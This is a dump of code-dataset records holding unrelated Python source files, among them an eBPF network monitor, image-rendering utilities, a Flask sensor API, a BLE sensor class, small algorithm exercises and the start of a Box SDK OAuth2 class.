~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PandaJerrrrrrrry/propellant","sub_path":"propellent_02_modules/_01_platform_Part/composite/composite_plugin.py","file_name":"composite_plugin.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"17794523706","text":"from __future__ import division # Get float instead of int for div\nfrom bcc import BPF\nimport socket\nimport time\nimport json\nimport logging\nimport random\n\nfrom datetime import datetime\n\nimport base64\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\nrunning_global = 0\nlosing_rate_global = 0\nstart_time_global = 0\ncommand_global = []\nb = BPF(src_file='monitor_ebpf.c')\n\nhost_address = ('', 10000)\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef serialize_stats():\n \"\"\"Parse gathered statistics to JSON format\"\"\"\n global start_time_global\n serialized = json.dumps({'time_start': start_time_global,\n 'time_end': time.time(),\n 'rcv_packets': b['stats_map'][0].value,\n 'snt_packets': b['stats_map'][1].value,\n 'tcp_packets': b['proto_map_snd'][socket.IPPROTO_TCP].value,\n 'udp_packets': b['proto_map_snd'][socket.IPPROTO_UDP].value,\n 'icmp_packets': b['proto_map_snd'][socket.IPPROTO_ICMP].value,\n 'arp_packets': b['stats_map'][2].value,\n 'ports': port_map_to_list(),\n 'ipv4_packets': b['stats_map'][3].value,\n 'ipv6_packets': b['stats_map'][4].value,\n 'retrans_packets': b['stats_map'][5].value\n })\n return serialized\n\n\ndef port_map_to_list():\n \"\"\"Gather ports numbers and make a list\"\"\"\n data_map = b['ports_map']\n port_list = []\n for k, v in data_map.items():\n if v.value != 0:\n port_list.append(k.value)\n return port_list\n\n\ndef send_error(error_msg, address):\n \"\"\"Send error to the indicated address\"\"\"\n logger.info('Error message sent to %s: %s' % (address[0], error_msg))\n sock.sendto(error_msg, address)\n\n\ndef random_wait():\n \"\"\"Wait for x seconds\"\"\"\n val = random.uniform(0, 101) / 100 # Between 0 and 1 seconds\n time.sleep(val)\n\n\ndef send_stats(initiator, command):\n \"\"\"Sends statistics to server or initiator\"\"\"\n json_stats = serialize_stats()\n logger.info('Gathered stats:%s' % json_stats)\n\n if 'server' in command: # Send stats to server\n stat_dst = (command['server'][0], int(command['server'][1]))\n else: # Send stats to initiator\n stat_dst = initiator\n\n random_wait() # Avoid sync between eBPF devices\n try:\n sock.sendto(json_stats, stat_dst)\n logger.info('Stats sent to %s' % (stat_dst[0]))\n print('Stats sent to %s' % (stat_dst[0]))\n clean_maps()\n except socket.error:\n print('ERROR: Stats not sent')\n\n\n\n\n\ndef clean_maps():\n global losing_rate_global\n b['stats_map'].clear()\n b['proto_map_snd'].clear()\n b['ports_map'].clear()\n losing_rate_global = 0\n\n\ndef start_ebpf():\n \"\"\"Start eBPF statistic gathering\"\"\"\n global running_global, command_global\n running_global = 1\n\n # Packets\n b.attach_kprobe(event='ip_rcv', fn_name='detect_rcv_pkts')\n b.attach_kprobe(event='ip_output', fn_name='detect_snt_pkts')\n\n # Protocols\n b.attach_kprobe(event='ip_output', fn_name='detect_protocol_snd')\n b.attach_kprobe(event='arp_rcv', fn_name='detect_arp')\n b.attach_kprobe(event='arp_send', fn_name='detect_arp')\n\n # Ports\n b.attach_kprobe(event='ip_output', fn_name='detect_dport')\n\n # IP family\n b.attach_kprobe(event='ip_output', fn_name='detect_family')\n b.attach_kprobe(event='ip_rcv', fn_name='detect_family')\n\n # Loss\n if command_global['cmd'] == 'THRESH':\n b.attach_kprobe(event='tcp_retransmit_timer', fn_name='detect_thresh_pkts')\n b.attach_kprobe(event='tcp_fastretrans_alert', fn_name='detect_thresh_pkts')\n else:\n b.attach_kprobe(event='tcp_retransmit_timer', fn_name='detect_retrans_pkts')\n b.attach_kprobe(event='tcp_fastretrans_alert', fn_name='detect_retrans_pkts')\n\n\ndef stop_ebpf():\n \"\"\"Stop eBPF statistic gathering\"\"\"\n global running_global\n running_global = 0\n\n b.detach_kprobe('ip_rcv')\n b.detach_kprobe('ip_output')\n b.detach_kprobe('arp_rcv')\n b.detach_kprobe('arp_send')\n b.detach_kprobe('tcp_retransmit_timer')\n b.detach_kprobe('tcp_fastretrans_alert')\n\n clean_maps()\n\n\ndef cmd_run(init_address, command):\n \"\"\"RUN command process\"\"\"\n global start_time_global\n logger.info('RUN for %s sec' % command['time'])\n start_ebpf()\n\n start_time_global = time.time() # eBPF starting timestamp\n time.sleep(command['time']) # Period of stat gathering\n\n send_stats(init_address, command)\n stop_ebpf()\n\n\ndef cmd_start():\n \"\"\"START command process\"\"\"\n global start_time_global\n logger.info('START')\n start_ebpf()\n start_time_global = time.time()\n\n\ndef cmd_get(init_address, command):\n \"\"\"GET command process\"\"\"\n global start_time_global\n logger.info('GET')\n send_stats(init_address, command)\n start_time_global = time.time()\n\n\ndef cmd_stop():\n \"\"\"STOP command process\"\"\"\n logger.info('STOP')\n stop_ebpf()\n\n\ndef cmd_period(init_address, command):\n \"\"\"PERIOD command process\"\"\"\n global start_time_global\n logger.info('PERIOD for %s sec, interval %s sec' % (command['time'], command['interval']))\n start_ebpf()\n\n future = time.time() + command['time']\n while time.time() < future: # Total period of stats gathering\n print('Next period')\n start_time_global = time.time() # eBPF starting timestamp\n time.sleep(command['interval']) # Interval between two stats gathering\n send_stats(init_address, command)\n\n stop_ebpf()\n\n\ndef parse_lost_data():\n \"\"\"Parse loss concerned data for logging\"\"\"\n global losing_rate_global\n msg = '%s :[snd :%s, retrans :%s]' % (\n datetime.fromtimestamp(time.time()).strftime(\"%H:%M:%S\"),\n losing_rate_global.snt_packets,\n losing_rate_global.retrans_packets)\n return msg\n\n\ndef cmd_thresh(init_address, command):\n \"\"\"THRESH command process\"\"\"\n global losing_rate_global, start_time_global\n logger.info('THRESH with rate: %s for %s sec' % (command['rate'], command['time']))\n\n start_ebpf()\n b['events'].open_perf_buffer(update_stats) # Opening channel for events from kernel\n\n future = time.time() + command['time'] # Period of stats gathering\n\n send_interval = 2 # Slow start and min. interval between two sending\n last_moment_sent = time.time() # Last time data was sent\n while time.time() < future:\n if time.time() - last_moment_sent > command['interval']:\n clean_maps()\n logger.info('Next period')\n last_moment_sent = time.time()\n start_time_global = time.time()\n timeout = int(future-time.time())\n\n if timeout > 0:\n b.perf_buffer_poll(timeout*1000) # Block until event happens or TO\n\n # If some lost data has been found\n if losing_rate_global != 0:\n lost_data = parse_lost_data()\n logger.info(lost_data)\n\n sent_pkts = losing_rate_global.snt_packets\n retrans_pkts = losing_rate_global.retrans_packets\n if sent_pkts != 0:\n logger.info('Loss rate:%f' % (retrans_pkts / sent_pkts))\n if ((retrans_pkts / sent_pkts) > command['rate']) and ((time.time() - last_moment_sent) > send_interval):\n print('Loss rate:%f' % (retrans_pkts / sent_pkts))\n send_stats(init_address, command)\n last_moment_sent = time.time()\n stop_ebpf()\n\n\ndef update_stats(cpu, data, size):\n \"\"\"Callback triggered when buffer_poll\"\"\"\n global losing_rate_global\n logger.debug('Updating stats')\n losing_rate_global = b[\"events\"].event(data)\n\n\ndef verify_signature(signed_data):\n \"\"\"Verification of signature\"\"\"\n data_tab = json.loads(signed_data)\n try:\n with open('public_key.pem', 'rb') as key_file: # Public key file\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n public_key.verify(\n signature=base64.urlsafe_b64decode(str(data_tab['signature'])),\n data=data_tab['message'].encode('utf-8'),\n padding=padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n algorithm=hashes.SHA256()\n )\n logger.info('Verified host')\n return data_tab['message']\n except InvalidSignature:\n logger.error('Wrong signature')\n return -1\n except ValueError:\n logger.error('Malformed signature')\n return -1\n\n\ndef main():\n try:\n sock.bind(host_address)\n logger.info('Socket binded to (addr:[%s],port:[%s])' % host_address)\n while True:\n print('Waiting for message...')\n data, init_address = sock.recvfrom(4096)\n logger.info('Message received')\n\n verified_data = verify_signature(data)\n if verified_data == -1:\n send_error('Bad signature', init_address)\n else:\n j = json.loads(verified_data)\n global command_global\n command_global = j\n print('\\nMessage received from %s:\\n%s\\n' % (init_address[0], verified_data))\n\n # Processing the command\n cmd = j['cmd']\n # Wrong command\n if (cmd == 'START' or cmd == 'PERIOD' or cmd == 'THRESH') and running_global:\n logger.error('Already running')\n elif (cmd == 'RUN') and running_global:\n logger.error('Already running')\n send_error('ERROR: Already running', init_address)\n elif cmd == 'GET' and not running_global:\n logger.error('Must first start the stat gathering with cmd: START')\n send_error('ERROR: Must first start the stat gathering with cmd: START', init_address)\n elif cmd == 'STOP' and not running_global:\n logger.error('Must first start the stat gathering with cmd: START')\n\n # Normal behavior\n elif cmd == 'RUN' and not running_global:\n cmd_run(init_address, j)\n elif cmd == 'START' and not running_global:\n cmd_start()\n elif cmd == 'GET' and running_global:\n cmd_get(init_address, j)\n elif cmd == 'STOP' and running_global:\n cmd_stop()\n elif cmd == 'PERIOD' and not running_global:\n cmd_period(init_address, j)\n elif cmd == 'THRESH' and not running_global:\n cmd_thresh(init_address, j)\n else:\n logger.error('Wrong command')\n print('ERROR: Wrong command')\n\n except (KeyboardInterrupt, SystemExit):\n print(\"\\nClosed.\")\n finally:\n logger.info('Closing socket')\n sock.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Aetheya/ebpf_monitor_IoT","sub_path":"monitor_ebpf.py","file_name":"monitor_ebpf.py","file_ext":"py","file_size_in_byte":11467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16478406166","text":"import json\n\nHEADER = \"\\033[95m\"\nOKBLUE = \"\\033[94m\"\nOKCYAN = \"\\033[96m\"\nOKGREEN = \"\\033[92m\"\nWARNING = \"\\033[93m\"\nFAIL = \"\\033[91m\"\nENDC = \"\\033[0m\"\nBOLD = \"\\033[1m\"\nUNDERLINE = \"\\033[4m\"\n\nfrom api.number.tests import test as number\n\n# bss_response = bss()\nprint(json.dumps(number(), indent=2, sort_keys=True, default=str))\n# report = [ {\"bss\": bss_response}, ]\n# for one in report:\n# name = next(iter(one))\n# for api in one[name]:\n# endpoint = next(iter(api))\n# print(WARNING + name + ENDC, end =\" : \")\n# print(OKGREEN + endpoint + ENDC, end =\" : response code = \")\n# print(OKCYAN + str(api[endpoint][\"response\"][\"code\"]) + ENDC)\n\n\n# print(json.dumps(one[name], indent=2, sort_keys=True, default=str))\n\n# print(json.dumps(report, indent=2, sort_keys=True, default=str))\n","repo_name":"Taher-web-dev/galleon","sub_path":"backend/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42783881266","text":"#!/usr/bin/env python\n\nfrom chdrft.cmds import CmdsList\nfrom chdrft.main import app\nfrom chdrft.utils.cmdify import ActionHandler\nfrom chdrft.utils.misc import Attributize\nimport chdrft.utils.misc as cmisc\nimport glog\nimport chdrft.display.vispy_utils as vispy_utils\nfrom chdrft.display.vispy_utils import ImageData\nfrom chdrft.display.service import g_plot_service as oplt\n\nimport chdrft.display.utils as dsp_utils\nimport random\nfrom chdrft.struct.base import Box\nimport numpy as np\nimport cv2\nfrom chdrft.struct.geo import QuadTree\nimport skimage.transform\n\nglobal flags, cache\nflags = None\ncache = None\n\n\ndef args(parser):\n clist = CmdsList().add(test)\n ActionHandler.Prepare(parser, clist.lst, global_action=1)\n\n\ndef composeit(outfile, data):\n cx = ImageComposer()\n for entry in data:\n cx.add_img(cmisc.Attr(data=get_img(entry), box=entry.box))\n\n res = cx.render()\n if outfile:\n dsp_utils.save_image(outfile, res)\n else:\n dsp_utils.plot_img(res)\n\n\ndef get_boundaries(imgs):\n colorset = ('red', 'blue', 'green', 'yellow')\n\n def get_color(gridpos):\n if gridpos is None: return 'orange'\n return colorset[(gridpos[0] & 1) << 1 | (gridpos[1] & 1)]\n\n boundaries = []\n\n for img_data in imgs:\n boundaries.append(\n cmisc.Attr(\n polyline=img_data.box.to_double().expand(random.uniform(0, 1) * 0.001 +\n 1).poly_closed(),\n color=get_color(img_data.gridpos)\n )\n )\n return boundaries\n\n\ndef render_compose(in_imgs, extra_meshes=[], render_boundaries=0, as_grid=0, **kwargs):\n\n images = []\n for img_data in in_imgs:\n img_data = ImageData.Make(img_data)\n images.append(ImageData(\n img=img_data.img,\n gridpos=img_data.gridpos,\n box=img_data.box,\n ))\n\n if as_grid: images = ImageGrid(images=images, **kwargs).get_images()\n\n meshes = []\n meshes.extend(extra_meshes)\n if render_boundaries: meshes.append(cmisc.Attr(lines=get_boundaries(images)))\n\n rects = []\n for img_data in images:\n rects.append(img_data.box)\n vb = Box.Union(rects)\n meshes.append(cmisc.Attr(images=images, cmap='grays', clim=(0, 1)))\n\n vctx= oplt.plot(meshes, camera_viewbox=vb, typ='vispy', o=1).w.vctx\n enable_cycling(vctx)\n return vctx\n\n\n\n\ndef render_with_gridpos(imgs, outfile=None, spacing=1.1):\n\n cx = ImageComposer()\n for obj in imgs:\n h, w = obj.img.shape[:2]\n dim_xy = np.array((w, h))\n cx.add_img(\n cmisc.Attr(data=obj.img, box=Box(low=np.floor(obj.gridpos * dim_xy * spacing), dim=dim_xy))\n )\n\n if outfile:\n dsp_utils.save_image(outfile, cx.render(upscale=1))\n else:\n dsp_utils.plot_img(cx.render(upscale=1))\n\n\ndef overlay_images(a, b, dab, **kwargs):\n imx = [\n ImageData(img=a, pos=dab),\n ImageData(img=b, pos=np.zeros(2)),\n ]\n render_compose(imx, **kwargs)\n\n\nclass ImageGrid:\n\n def __init__(self, n=None, base_dim=None, images=None, spacing=0.1, nr=None, nc=None):\n if n is None: n = len(images)\n self.n = n\n\n def get_other(nx):\n return int(np.ceil(self.n / nx))\n\n if nc is not None: nr = get_other(nc)\n elif nr is not None: nc = get_other(nr)\n else:\n nr = int(self.n**0.5 + 1)\n nc = get_other(nr)\n\n self.nr = nr\n self.nc = nc\n self.data = []\n if images is not None:\n images = list(map(ImageData.Make, images))\n\n if base_dim is None:\n dims = [x.box.dim for x in images]\n base_dim = np.max(dims, axis=0)\n base_dim = np.array(base_dim)\n\n dim_spacing = base_dim * (1 + spacing)\n box = Box(low=(0, 0), dim=base_dim)\n\n for i in range(self.n):\n y = i // self.nc\n x = i % self.nc\n offset = dim_spacing * (x, y)\n self.data.append(ImageData(gridpos=(x, y), box=box+offset))\n self.dim_spacing = dim_spacing\n self.setup(images)\n\n def setup(self, images):\n if not images: return\n for i in range(len(images)):\n self.data[i].set_image(images[i].img)\n\n pos = self.data[i].pos\n if images[i].gridpos is not None:\n pos = self.dim_spacing * images[i].gridpos\n self.data[i].gridpos = self.images[i].gridpos\n self.data[i].stuff = images[i].stuff\n self.data[i].configure_box(images[i].box.zero_corner() + pos)\n\n def get_images(self):\n return list(self.data)\n\n\nclass ImageComposer:\n\n def __init__(self, imgs=[]):\n self.imgs = list(imgs)\n self.qtree = QuadTree(imgs)\n\n def add_img(self, img_data):\n self.imgs.append(img_data)\n self.qtree.add(img_data)\n\n def render(self, upscale=2):\n assert len(self.imgs) > 0\n boxes = list(img.box for img in self.imgs)\n pix_per_units = np.max([img.data.shape / img.box.shape for img in self.imgs], axis=0) * upscale\n\n self.rx = Range2D.Union(boxes)\n img_box = (self.rx * pix_per_units).to_int()\n self.pix_per_units = pix_per_units\n base_img = np.zeros(img_box.shape)\n for img in self.imgs:\n self.render_img(base_img, img)\n return base_img\n\n def render_img(self, base_img, img):\n new_box = ((img.box - self.rx.low) * self.pix_per_units).to_int()\n new_img = skimage.transform.resize(img.data, new_box.shape)\n base_img[new_box.window_yx] = new_img\n\n def render_box_fixed_dim(self, box, target_dim=None, upscale=1, **kwargs):\n u2px = self.imgs[0].u2px\n\n if target_dim is None:\n res = ImageData.Zero(box, u2px * upscale, **kwargs)\n else:\n target_box = Box.FromSize(target_dim)\n res = ImageData(img=target_box.make_zero_image(), box=target_box, **kwargs)\n\n elems = self.qtree.query_box(box, key=lambda x: x.box)\n for img in elems:\n ix = box.intersection(img.box)\n\n dest_box = box.change_rect_space(res.img_box, ix).to_int_round()\n src_box = img.box.change_rect_space(img.img_box, ix).to_int_round()\n if src_box.empty or dest_box.empty: continue\n simg = img.subimg(ix)\n print(ix, dest_box, simg.shape, dest_box.get_dim(res.yx), res.yx, res.box, res.img.shape)\n rescaled_img = skimage.transform.resize(simg, dest_box.get_dim(res.yx), order=0)\n res.subimg(ix, v=rescaled_img)\n return res\n\n\ndef render_grid(grid):\n vctx = grid.render(render_boundaries=1)\n enable_cycling(vctx)\n return vctx\n\n\ndef cycle_ev(d):\n\n imgs = [x.obj for x in d.cnds if isinstance(x.obj.obj, ImageData) and x.score == 0]\n imgs.sort(key=lambda x: x.ctxobj.vispy.transform.translate[2])\n\n n = len(imgs)\n for i in range(n):\n tsf = imgs[i].ctxobj.vispy.transform\n translate = tsf.translate\n translate[2] = 0.1 + (i + 1) % n #zindex\n imgs[i].ctxobj.vispy.transform = vispy_utils.transforms.STTransform(\n scale=tsf.scale, translate=translate\n )\n imgs[i].ctxobj.vispy.update()\n\n\ndef enable_cycling(vctx):\n vctx.click_sub.observers.clear()\n vctx.click_sub.subscribe(cycle_ev)\n\n\ndef main():\n ctx = Attributize()\n ActionHandler.Run(ctx)\n\n\napp()\n","repo_name":"unjambonakap/chdrft","sub_path":"display/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"30747102354","text":"import luigi\nimport os\n\n\nclass PrintWordTask(luigi.Task):\n path = luigi.Parameter()\n word = luigi.Parameter()\n\n def run(self):\n with open(self.path, 'w') as out_file:\n out_file.write(self.word)\n out_file.close()\n\n def output(self):\n return luigi.LocalTarget(self.path)\n\n def requires(self):\n return [\n MakeDirectory(path=os.path.dirname(self.path)),\n ]\n\n\nclass HelloWorldTask(luigi.Task):\n id = luigi.Parameter(default='test')\n\n def run(self):\n with open(self.input()[0].path, 'r') as hello_file:\n hello = hello_file.read()\n with open(self.input()[1].path, 'r') as world_file:\n world = world_file.read()\n with open(self.output().path, 'w') as output_file:\n content = '{} {}!'.format(hello, world)\n output_file.write(content)\n output_file.close()\n\n def requires(self):\n return [\n PrintWordTask(\n path='results/{}/hello.txt'.format(self.id),\n word='Hello',\n ),\n PrintWordTask(\n path='results/{}/world.txt'.format(self.id),\n word='World',\n ),\n ]\n\n def output(self):\n path = 'results/{}/hello_world.txt'.format(self.id)\n return luigi.LocalTarget(path)\n\n\nclass MakeDirectory(luigi.Task):\n path = luigi.Parameter()\n\n def output(self):\n return luigi.LocalTarget(self.path)\n\n def run(self):\n os.makedirs(self.path)\n\n\nif __name__ == '__main__':\n luigi.run()","repo_name":"elbertsoftware/SpringboardAIC","sub_path":"salinization/prototype/luigi-hello-world/hello_world_org.py","file_name":"hello_world_org.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"27585483483","text":"from datetime import datetime, timedelta\n\nfrom app import app, db\nfrom flask import render_template, jsonify, abort, request\nfrom .models import Config, Sensor, Measurement, Category, Location, pLast\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n u = Config.query.all()\n m = Measurement.query.order_by('-id').first()\n return render_template('index.html', configs=u, measure=m)\n\n\n@app.route('/sensor')\ndef sensor_list():\n sensors = Sensor.query.all()\n return render_template('sensor.html', sensors=sensors)\n\n\n\n\n@app.route('/measure//', methods=['get'])\n@app.route('/measure//', methods=['get'])\ndef get_measure(sensor_id, type='H'):\n delays = {'H' : 1, 'D': 24, 'W': 170, 'M': 5040, 'Y': 61000}\n sensor = Sensor.query.get(sensor_id)\n if sensor is None:\n abort(404)\n ms = Measurement.query.join(Sensor).filter(Sensor.id == sensor.id,\n Measurement.date > datetime.now() - timedelta(hours=delays[type])).order_by(Measurement.date.desc())\n return render_template('measure.html', sensor=sensor, measures=ms)\n\n\n# API DEFINITION\n\n# MEASURES\n# Api is open to all kind of measurements\n# If receives an unknown sensor, it will add the given sensor !\n# Integrates the measurement in the database\n# retrieves data\n@app.route('/api/v1/measure/', methods=['POST'])\ndef add_measure(sensor_id):\n sensor = Sensor.query.get(sensor_id)\n if sensor is None: # Sensor is not known\n # Look for default category\n cat = Category.query.get(0)\n if cat is None:\n cat = Category('Default', 'Default')\n db.session.add(cat)\n db.session.commit()\n\n loc = Location.query.get(0)\n if loc is None:\n loc = Location('Default', 'Default')\n db.session.add(loc)\n db.session.commit()\n\n sensor = Sensor(sensor_id, 'Not Defined', cat, loc)\n db.session.add(sensor)\n if not request.json or not 'value' in request.json:\n abort(400)\n data = request.get_json()\n\n measuredvalue = float(data.get('value')) # @TODO: Check if value is float ...\n # retrieve last two measurement to check if value is changeing\n lastm = Measurement.query.join(Sensor).filter(Sensor.id == sensor.id). \\\n order_by(Measurement.date.desc()).limit(2).all()\n tol = 0.005 # @TODO: Make it a config variable at some point\n if len(lastm) == 2 and ( abs(float(lastm[0].value) - float(lastm[1].value)) <= tol) and ( abs(float(lastm[0].value) - measuredvalue) <= tol) : # we have two items already in the list, we have to check if last two are equals, if so, we update last one with new timestamp\n lastm[0].date = datetime.now()\n m = lastm[0]\n else: # creates a measurement value\n m = Measurement(sensor, data.get('value'), datetime.now())\n db.session.add(m)\n\n db.session.commit()\n return jsonify(m.toJSON())\n\n\n# CONFIG\n@app.route('/api/v1/config', methods=['GET']) # Get all keys\n@app.route('/api/v1/config/', methods=['GET']) # Get only specified\ndef get_config(key=None):\n \"\"\" try to load the value \"\"\"\n if not key: # query all if no value provided, happens when first route is called\n u = Config.query.all()\n else: # query given key otherwise\n q = Config.query.get(key)\n if q is None: # fails if key not found\n abort(404)\n else: # prepare for output otherwise\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u ])\n\n\n@app.route('/api/v1/config', methods=['POST']) # Create a configuration, or update\ndef create_config():\n if not request.json or not 'key' in request.json or not 'value' in request.json:\n abort(400)\n data = request.get_json()\n q = Config(data.get('key'), data.get('value'))\n db.session.merge(q)\n db.session.commit()\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u ])\n\n\n@app.route('/api/v1/config/', methods=['PUT']) # Update a configuration\ndef update_config(key):\n q = Config.query.get(key)\n if q is None:\n abort(404)\n q.value = request.json.get('value', q.value)\n db.session.commit()\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u ])\n","repo_name":"mtauban/climabr","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73272351872","text":"import abc\nimport logging\nimport typing as ty\n\nfrom ..protocols.xiaomi import XiaomiPoller\nfrom .base import SENSOR_DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass XiaomiHumidityTemperature(XiaomiPoller, abc.ABC):\n SENSOR_CLASS: ty.Any = None\n # send data only if temperature or humidity is set\n REQUIRED_VALUES = ('temperature', 'humidity')\n\n @property\n def entities(self):\n return {\n SENSOR_DOMAIN: [\n {\n 'name': 'temperature',\n 'device_class': 'temperature',\n 'unit_of_measurement': '\\u00b0C',\n },\n {\n 'name': 'humidity',\n 'device_class': 'humidity',\n 'unit_of_measurement': '%',\n },\n {\n 'name': 'battery',\n 'device_class': 'battery',\n 'unit_of_measurement': '%',\n 'entity_category': 'diagnostic',\n },\n ],\n }\n\n async def read_and_send_data(self, publish_topic):\n battery = await self._read_with_timeout(self.BATTERY_CHAR)\n data_bytes = await self._stack.get()\n # clear queue\n while not self._stack.empty():\n self._stack.get_nowait()\n self._state = self.SENSOR_CLASS.from_data(data_bytes, battery)\n await self._notify_state(publish_topic)\n","repo_name":"devbis/ble2mqtt","sub_path":"ble2mqtt/devices/xiaomi_base.py","file_name":"xiaomi_base.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"60"} +{"seq_id":"31527215802","text":"def knapsack_01(items, capacity):\n n = len(items)\n\n\n # Create a 2D table to store the maximum weights\n table = [[0] * (capacity + 1) for _ in range(n + 1)]\n\n\n for i in range(1, n + 1):\n for w in range(1, capacity + 1):\n if items[i - 1][1] <= w:\n table[i][w] = max(table[i - 1][w], table[i - 1][w - items[i - 1][1]] + items[i - 1][1])\n else:\n table[i][w] = table[i - 1][w]\n\n\n # Retrieve the included items by backtracking through the table\n included_items = []\n i = n\n w = capacity\n while i > 0 and w > 0:\n if table[i][w] != table[i - 1][w]:\n included_items.append(items[i - 1])\n w -= items[i - 1][1]\n i -= 1\n\n\n return included_items[::-1]\n\n\n# Test the knapsack algorithm with the provided item weights and trolley capacity\nitems = [(\"Corn sack\", 12), (\"Hoe\", 5), (\"Oil tank\", 10), (\"Tires\", 16)]\ntrolley_capacity = 30\n\n\nincluded_items = knapsack_01(items, trolley_capacity)\n\n\nif included_items:\n total_weight = sum(item[1] for item in included_items)\n print(\"The item carried on the trolley is:\")\n for item in included_items:\n print(f\"Item: {item[0]}, Weight: {item[1]}kg\")\n print(f\"Total Weight: {total_weight}kg\")\nelse:\n print(\"No combination of items fits within the trolley's capacity.\")\n","repo_name":"adlynasn/MurderMansion","sub_path":".idea/MAIN/part6.py","file_name":"part6.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"69997628030","text":"import random as rand\n\n\nclass Node:\n # Constructor to initialize the node object\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList:\n # Function to initialize head\n def __init__(self):\n self.head = None\n\n # Function to insert a new node at the beginning\n def push(self, new_data):\n new_node = Node(new_data)\n new_node.next = self.head\n self.head = new_node\n\n # Utility function to print the LinkedList\n def printList(self):\n temp = self.head\n while temp:\n print(temp.data, end=\" \")\n temp = temp.next\n print(\"\\n\")\n\n def set_next(self, next):\n self.next = next\n\n # Recursive function to delete the linked list\n def delete_list(self):\n if self.head is None:\n return\n while self.head:\n print(self.head.data, end=\" \")\n del self.head.data\n self.head = self.head.next\n\n\n# Driver program to test above functions\nllist = LinkedList()\n\nrand_len = rand.randint(1, 100)\nfor i in range(rand_len):\n llist.push(rand.randint(1, 100))\n\n\nprint(\"\\nGiven Linked List\")\nllist.printList()\nprint(\"\\nDeleting Linked List\")\nllist.delete_list()\n\nprint(\"\\nNew Linked List [1,2,3,4]\")\nfor i in [1, 2, 3, 4]:\n llist.push(i)\nllist.printList()\n","repo_name":"DSAatUSU/ChatGPT-promises-and-pitfalls","sub_path":"humanCode/algorithms-data-structures/recursion/recursively-deletes-every-node-in-an-arbitrarily-long-linked.py","file_name":"recursively-deletes-every-node-in-an-arbitrarily-long-linked.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"71701298432","text":"# Write a Python program to print the following integers with zeros to the left of the specified width.\n#n1 = 3\n#w1 = 2\n#n2 = 123\n#w2 = 6\nif __name__ == \"__main__\":\n n1 = 3\n n2 = 123\n print(\"Number 1: {:02d}\".format(n1))\n print(\"Number 2: {:06d}\".format(n2))","repo_name":"v-t-9/PythonDataTypes-w3r","sub_path":"String/ex33.py","file_name":"ex33.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34793827996","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom threading import Lock\nimport random\nimport string # pylint:disable=deprecated-module\n\nfrom six.moves.urllib.parse import urlencode, urlunsplit # pylint:disable=import-error,no-name-in-module\n\nfrom boxsdk.network.default_network import DefaultNetwork\nfrom boxsdk.config import API\nfrom boxsdk.exception import BoxOAuthException\n\n\nclass OAuth2(object):\n \"\"\"\n Responsible for handling OAuth2 for the Box API. Can authenticate and refresh tokens.\n \"\"\"\n\n def __init__(\n self,\n client_id,\n client_secret,\n store_tokens=None,\n box_device_id='0',\n box_device_name='',\n access_token=None,\n refresh_token=None,\n network_layer=None,\n refresh_lock=None,\n ):\n \"\"\"\n :param client_id:\n Box API key used for identifying the application the user is authenticating with.\n :type client_id:\n `unicode`\n :param client_secret:\n Box API secret used for making OAuth2 requests.\n :type client_secret:\n `unicode`\n :param store_tokens:\n Optional callback for getting access to tokens for storing them.\n :type store_tokens:\n `callable`\n :param box_device_id:\n Optional unique ID of this device. Used for applications that want to support device-pinning.\n :type box_device_id:\n `unicode`\n :param box_device_name:\n Optional human readable name for this device.\n :type box_device_name:\n `unicode`\n :param access_token:\n Access token to use for auth until it expires.\n :type access_token:\n `unicode`\n :param refresh_token:\n Refresh token to use for auth until it expires or is used.\n :type refresh_token:\n `unicode`\n :param network_layer:\n If specified, use it to make network requests. If not, the default network implementation will be used.\n :type network_layer:\n :class:`Network`\n :param refresh_lock:\n Lock used to synchronize token refresh. If not specified, then a :class:`threading.Lock` will be used.\n :type refresh_lock:\n Context Manager\n \"\"\"\n self._client_id = client_id\n self._client_secret = client_secret\n self._store_tokens_callback = store_tokens\n self._access_token = access_token\n self._refresh_token = refresh_token\n 